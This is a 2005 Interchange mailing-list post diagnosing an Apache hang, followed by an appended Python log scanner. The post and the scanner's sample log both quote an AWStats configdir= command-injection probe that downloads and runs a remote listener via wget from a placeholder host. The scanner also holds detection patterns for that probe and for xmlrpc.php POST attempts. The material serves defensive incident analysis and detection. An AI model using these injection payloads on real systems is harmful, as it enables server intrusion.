[ic] mod_interchange and Apache MaxClients
John1
list_subscriber at yahoo.co.uk
Mon Nov 21 19:47:30 EST 2005
########### snippet from previous post:
The Apache access log shows just 3 entries before the site went down, all
from hackers_IP. For interest, these were along the lines of:
/cgi-bin/awstats/awstats.pl/?configdir=|echo;echo YYY;cd /tmp;wget
x.x.x.x/flisten;chmod +x listen;./listen y.y.y.y;echo YYY;echo|
##########
OK, it's conclusive, the above "hacker" script is definitely the cause of
our site stopping responding at the moment (and I suspect Ron's and Jeff's
also - can you confirm this?). Our site stopped responding again tonight
and was restarted by Ron's script again. This time the site went down when
there were many connections, but one IP address stood out as having 10
connections to Apache. Sure enough, when I searched our Apache access log
for access from this suspicious IP address I saw the same 3 entries as the
last time the site stopped responding:
1) /awstats/awstats.pl/?configdir=|echo;echo YYY;cd /tmp;wget
x.x.x.x/flisten;chmod +x listen;./listen y.y.y.y;echo YYY;echo|
2) /cgi-bin/awstats.pl/?configdir=|echo;echo YYY;cd /tmp;wget
x.x.x.x/flisten;chmod +x listen;./listen y.y.y.y;echo YYY;echo|
3) /cgi-bin/awstats/awstats.pl/?configdir=|echo;echo YYY;cd /tmp;wget
x.x.x.x/flisten;chmod +x listen;./listen y.y.y.y;echo YYY;echo|
Now these were the only 3 entries, but searching around on the web I have
found that this script goes on to try to exploit the xml-rpc vulnerability
by sending a variety of POST requests to xmlrpc.php (which it tries to find
in a variety of locations)
e.g. POST /drupal/xmlrpc.php with XML in the body of the POST request.
Here is an analysis of the packets sent (not particularly readable, but all
the information is there):
http://www.philippinehoneynet.org/charts_2005-11-11/awstats.html
There are many references to this hacking script on the web - most dated Nov
2005, so it appears to be a very new script. Here are a couple of links to
overviews:
http://www.philippinehoneynet.org/dataarchive.php?date=2005-11-11
http://isc.sans.org/diary.php?storyid=823
We did have several sites running on the same Apache webserver, but they
were all development sites, so once Apache started hanging I decided to
remove all the other sites so that Apache was only hosting our main
Interchange website. Interestingly, prior to removing these other websites
I was seeing these POST requests to xmlrpc.php in the Apache error log (but
in relation to our *non-interchange* websites). Since removing these
websites, I am not seeing any of these xmlrpc.php POST attempts in the
Apache error log.
As mentioned, the *only* 3 requests from the hacker's IP address before the
site stops responding are the 3 awstats.pl GET requests. I believe the 4th
request (which we don't see in the log) is a POST request to xmlrpc.php.
From this, I conclude that this same script when used against our other
websites was not causing Apache to fall over. But, when used against our
Interchange site the webserver does stop responding. So, it looks like it
is these POST attempts to non-existent pages on our Interchange site that
are causing Apache to hang, so I presume it is mod_interchange that is being
tripped up by these POST requests.
I know that the Interchange missing.html page is served up if a GET request
is made for a non-existent page, but what happens if a POST request is made
for a non-existent page? As mentioned, the POST request tries to send some
XML in the body of its request (the above 2 links provide more detail).
Kevin, I am rather hoping that you may be able to spot a reason why
mod_interchange may not be coping well with these POST requests to the
non-existent xmlrpc.php page? Thank you everyone for your continued help on
trying to solve this one - hopefully we are getting closer...
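As an added example (not part of the original thread or of Interchange itself), a small Python script that does the check described above on an Apache access log: it flags the awstats.pl configdir= probe and any POST aimed at xmlrpc.php, and counts requests per source IP so that a single address with many connections stands out. The log lines are constructed for the example; 203.0.113.5 and 198.51.100.7 are documentation addresses.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Apache common/combined log format: ip ident user [time] "METHOD path PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+')

# The awstats.pl probe from the post: a configdir= value that opens with a shell pipe.
AWSTATS_PROBE = re.compile(r'awstats\.pl/?\?configdir=\|', re.IGNORECASE)

# Constructed sample log (not from the original message); IPs are documentation addresses.
SAMPLE_LOG = """\
203.0.113.5 - - [21/Nov/2005:19:40:01 -0500] "GET /awstats/awstats.pl/?configdir=|echo;echo%20YYY;cd%20/tmp;wget%20x.x.x.x/flisten;chmod%20+x%20listen;./listen%20y.y.y.y;echo%20YYY;echo| HTTP/1.1" 404 281
203.0.113.5 - - [21/Nov/2005:19:40:02 -0500] "GET /cgi-bin/awstats.pl/?configdir=|echo;echo%20YYY;cd%20/tmp;wget%20x.x.x.x/flisten;chmod%20+x%20listen;./listen%20y.y.y.y;echo%20YYY;echo| HTTP/1.1" 404 281
203.0.113.5 - - [21/Nov/2005:19:40:02 -0500] "GET /cgi-bin/awstats/awstats.pl/?configdir=|echo;echo%20YYY;cd%20/tmp;wget%20x.x.x.x/flisten;chmod%20+x%20listen;./listen%20y.y.y.y;echo%20YYY;echo| HTTP/1.1" 404 281
203.0.113.5 - - [21/Nov/2005:19:40:03 -0500] "POST /drupal/xmlrpc.php HTTP/1.1" 404 281
198.51.100.7 - - [21/Nov/2005:19:40:05 -0500] "GET /index.html HTTP/1.1" 200 5120
"""

def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['path'] = unquote(rec['path'])  # decode %20 etc. before pattern matching
    return rec

def is_probe(rec):
    """True for the awstats configdir= injection or a POST aimed at xmlrpc.php."""
    return bool(AWSTATS_PROBE.search(rec['path'])) or (
        rec['method'] == 'POST' and rec['path'].split('?')[0].endswith('xmlrpc.php'))

def find_probes(log_text):
    """Return (ip, method, path) for every request matching a probe signature."""
    recs = filter(None, map(parse_line, log_text.splitlines()))
    return [(r['ip'], r['method'], r['path']) for r in recs if is_probe(r)]

def requests_per_ip(log_text):
    """Count requests per client IP: the 'one IP stood out' check from the post."""
    return Counter(r['ip'] for r in map(parse_line, log_text.splitlines()) if r)

if __name__ == '__main__':
    for ip, n in requests_per_ip(SAMPLE_LOG).most_common():
        print(f'{ip}: {n} requests')
    for ip, method, path in find_probes(SAMPLE_LOG):
        print(f'probe from {ip}: {method} {path[:60]}')
```

To run it against a real log, read the file and pass its text to `find_probes` and `requests_per_ip` in place of `SAMPLE_LOG`.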